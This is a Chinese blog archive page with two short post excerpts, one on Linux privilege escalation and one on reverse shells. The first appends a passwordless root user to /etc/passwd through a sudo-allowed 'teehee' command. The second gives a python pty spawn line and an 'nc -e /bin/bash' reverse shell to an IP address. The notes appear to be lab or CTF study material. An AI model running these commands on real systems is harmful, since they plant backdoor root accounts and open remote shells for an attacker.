会员
周边
新闻
博问
闪存
赞助商
YouClaw
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
中毒219
博客园
首页
新随笔
联系
订阅
管理
09 2021 档案
linux 提权
摘要:1.sudo提权 通过命令sudo -l查看是否有可提权的命令。 teehee teehee --help 发现-a参数 可以追加 那麽我们选择给/etc/passwd 追加我们自己定义的用户名 echo 'admin::0:0::/home/admin:/bin/bash' |sudo teehe
阅读全文
posted @
2021-09-05 16:40
中毒219
阅读(118)
评论(0)
推荐(0)
shell反弹
摘要:1.python python -c 'import pty;pty.spawn("/bin/bash")' 2.nc nc -e /bin/bash 192.168.41.123 789
阅读全文
posted @
2021-09-05 16:37
中毒219
阅读(34)
评论(0)
推荐(0)
公告